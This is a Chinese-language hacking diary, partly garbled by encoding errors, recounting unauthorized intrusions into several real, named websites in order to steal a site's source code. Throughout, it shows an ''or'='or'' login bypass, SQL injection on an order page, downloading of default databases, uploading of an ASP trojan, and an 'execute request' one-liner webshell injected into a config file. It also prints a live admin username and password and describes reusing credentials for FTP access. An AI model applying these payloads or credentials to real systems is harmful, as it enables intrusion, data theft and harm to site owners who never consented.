入侵原因,
繞來繞去的入侵技術(shù)
。我朋友對(duì)http://www.059466.com/里的模擬考試程序非常感興趣,要源碼。要源碼咱就……
整體看
首頁應(yīng)該自己編寫的。點(diǎn)連接加’測(cè)試注入。發(fā)現(xiàn)過濾了,不過過濾了post和get。Cookie應(yīng)該沒過濾。。我也沒嘗試。換種方法再說。
先不管了,找下后臺(tái)?催@個(gè)網(wǎng)站有點(diǎn)像企業(yè)站。就隨便加了個(gè)manage目錄。。沒想到還真有。界面也非常丑陋。http://www.059466.com/manage/Login.asp估計(jì)是自己寫的。
‘or’=’or’
進(jìn)去了
看這菜單。寒心。這樣的管理功能能拿到webshell?郁悶。
于是我犯了一個(gè)錯(cuò)誤。以為這就是后臺(tái)。于是我就旁注去了。如果我認(rèn)真想下前臺(tái)的功能,就不會(huì)這樣犯了。這是后話。
旁注嘛,打開http://www.114best.com/ip/114?w=www.059466.com
共檢測(cè)到 36 個(gè)網(wǎng)站與www.059466.com在同一IP服務(wù)器上
找啊找啊。http://www.20030.cn/ 的站點(diǎn)。加admin跳后臺(tái)
木目下載系統(tǒng)。百度一下。下載一份。查看默認(rèn)數(shù)據(jù)庫。最后用admin admin登陸進(jìn)去- -
管理菜單還是弱弱的
技術(shù)不行,拿不到后臺(tái)。沒考慮用一句話方式。。。
換站繼續(xù)http://www.ylpa.net/ 這個(gè)也是 在版權(quán)處看到Powered By WRMPS v5.0.2 2006-2009 Wangren Inc. 下載一份。按照默認(rèn)庫下載
可是,本地打開傻眼。
Wm_password 才十位。。啊們。。?礃幼討(yīng)該是md5后取十位了 看下login.asp代碼 找到md5 模塊
MD5=Left(LCase(WordToHex(b) & WordToHex(c)),10)
果然。。。請(qǐng)教了bs大叔后,知道除了自己寫程序跑密碼就沒其他辦法,不過事后我想通過cookie欺騙不知道是否能行?哪位老大知道的說下~
最終也是放棄了。雖然……
繼續(xù)找站。http://www.huayi2008.com
常規(guī)方法沒效果。隨便點(diǎn)連接,看到了友情連接。
原來還有sc目錄。。。進(jìn)去看下
注冊(cè)登陸。后來發(fā)現(xiàn)其實(shí)不注冊(cè)也行,下面有 非會(huì)員直接進(jìn)入 的連接
還是科訊的產(chǎn)品。;枇恕。直接上傳asp木馬呢???事實(shí)告訴我我RP還是不錯(cuò)的。
上傳完畢。可是地址呢。。。竟然沒回顯。。。暈,F(xiàn)在有個(gè)思路就是自己下載一份系統(tǒng)。然后觀看上傳文件的目錄以及文件名的規(guī)律。于是百度下 科汛在線輸出產(chǎn)品 找到
http://www.kesion.com/twcs/v2008/ 還真的是科汛的產(chǎn)品。。。發(fā)現(xiàn)是收費(fèi)的。。我XXX。郁悶
不過訂單連接。。
查看訂單,http://www.huayi2008.com/sc/showorder.asp?id=359 加’ 報(bào)錯(cuò)。加and 1=1 正常。加and 1=2出錯(cuò)。暈。注入點(diǎn)。。。
用工具吧。密碼沒加密 很好。username:huayi2008com
password:36399796 用這賬號(hào)登陸就是admin權(quán)限。
訂單管理果然看到我們的上傳文件。
http://www.huayi2008.com/sc/system/uploadimages/12.asp
連接~兩分鐘后發(fā)現(xiàn)shell不見了,
電腦資料
《繞來繞去的入侵技術(shù)》(http://m.clearvueentertainment.com)。。。難道被管理員發(fā)現(xiàn)了?再上傳。。。再不見。。原來是殺軟。。這webshell還是免殺的。。太變態(tài)的殺毒軟件了吧。。。提權(quán)。?。失敗了。。。真的沒什么思路。SerV-u等第三方軟件都沒安裝。。就安裝安全軟件。C d e 都不可讀。那我們的最開始目標(biāo)呢?難道不要那源碼了?
繞啊繞啊繞回來
郁悶 繼續(xù)看原來的站。http://www.059466.com/ 哦。前臺(tái)還有留言板。那manage下面為什么沒。難道還有真正的后臺(tái)不成?這是假的》?http://www.059466.com/Admin_Login.asp 暈。隨便看下真的還有。。。這個(gè)難辦了。沒賬號(hào)密碼…
在留言板我看到一張圖片。一個(gè)細(xì)節(jié),決定這次的成功。
高貝留言???解釋是?高貝聲音留言?? - -顯然不是。這應(yīng)該是一個(gè)cms吧。百度下載。
果然。。。找到默認(rèn)數(shù)據(jù)庫。Database\GaoBeiSys_V1x.mdb
訪問目標(biāo)站。
暈了。改數(shù)據(jù)庫了?這時(shí)我注意到Database\GaoBeiSys_V1x.mdb
V1x.mdb 1.0的版本?那如果他用2.0呢 不就是Database\GaoBeiSys_V2x.mdb
…果然。!
用迅雷下載~啦啦啦啦啦啦。。。本地看密碼.跑md5。。耶。出來了、
進(jìn)后臺(tái)發(fā)現(xiàn)這系統(tǒng)夠強(qiáng)大。
有數(shù)據(jù)庫備份~太好了。按照我們常規(guī)的思路就是上傳圖片馬,備份生成asp。好。不過又是一個(gè)難題。
竟然是空白頁面。
看來upload.asp被管理員刪除了。。。這下郁悶了。不過有數(shù)據(jù)庫備份我們可以通過插一句話來。通過查看高貝的源文件。我發(fā)現(xiàn)一個(gè)重要文件。\Include\Gaobei_Setup.asp
和后臺(tái)的系統(tǒng)幾本設(shè)置一樣。就是保存在asp文件。這樣我們就有機(jī)可乘!
<%
Gaobei_Title= "高貝系統(tǒng) V 2.0"
我們把高貝系統(tǒng) V 2.0替換成 “%><%execute request(“fuck”)<%gaobei_fuck=”這樣就完全閉合了。然后用一句話連接\Include\Gaobei_Setup.asp.成了!(這步感謝小帥給我那個(gè)laker2最小馬。郁悶了很久!也鄙視他改主頁 =_=)…
進(jìn)入后我隨便看了下發(fā)現(xiàn)有個(gè)bbs/的目錄,看文件結(jié)構(gòu)是phpwind.我們看下其數(shù)據(jù)庫
Data/sql_config.php
這時(shí)我突然想到一個(gè)問題。就是我們購買虛擬機(jī)的時(shí)候,ftp的賬號(hào)和mysql賬號(hào)密碼都是一致的!包括虛擬機(jī)的管理頁面…果然 登陸ftp成功
有ftp..要啥有啥。。嘿嘿。。。
好了好了。。。就是這樣了。總結(jié)下。
1. 由于第一次找了一個(gè)錯(cuò)誤的低功能的后臺(tái)讓我走錯(cuò)了路,旁注失敗。服務(wù)器權(quán)限太死。誰有興趣提權(quán)的找我吖!
2. 在旁注過程中看到了一個(gè)不算很新的密碼加密算法。Md5后取前十位,可以借鑒。畢竟現(xiàn)在md5破解弱智密碼很簡(jiǎn)單。如果取前十位。那就難了。
3. http://www.huayi2008.com/Chinese/index.asp 看到友情連接,鏈接到sc/目錄。導(dǎo)致此站點(diǎn)的崩潰。
4. 提權(quán)-失敗。服務(wù)器開啟3389端口
5. 回到原點(diǎn),認(rèn)真看前臺(tái),發(fā)現(xiàn)功能強(qiáng)大,假后臺(tái)功能弱小。
6. 看cms的圖片分辨出是用哪個(gè)cms系統(tǒng)。(這點(diǎn)非常好用!因?yàn)槟憧梢愿腸ms的文字,但是有些管理員懶得改圖片,要ps掉 版權(quán)。以前也用過。┤缓笸ㄟ^版本得到數(shù)據(jù)庫路徑。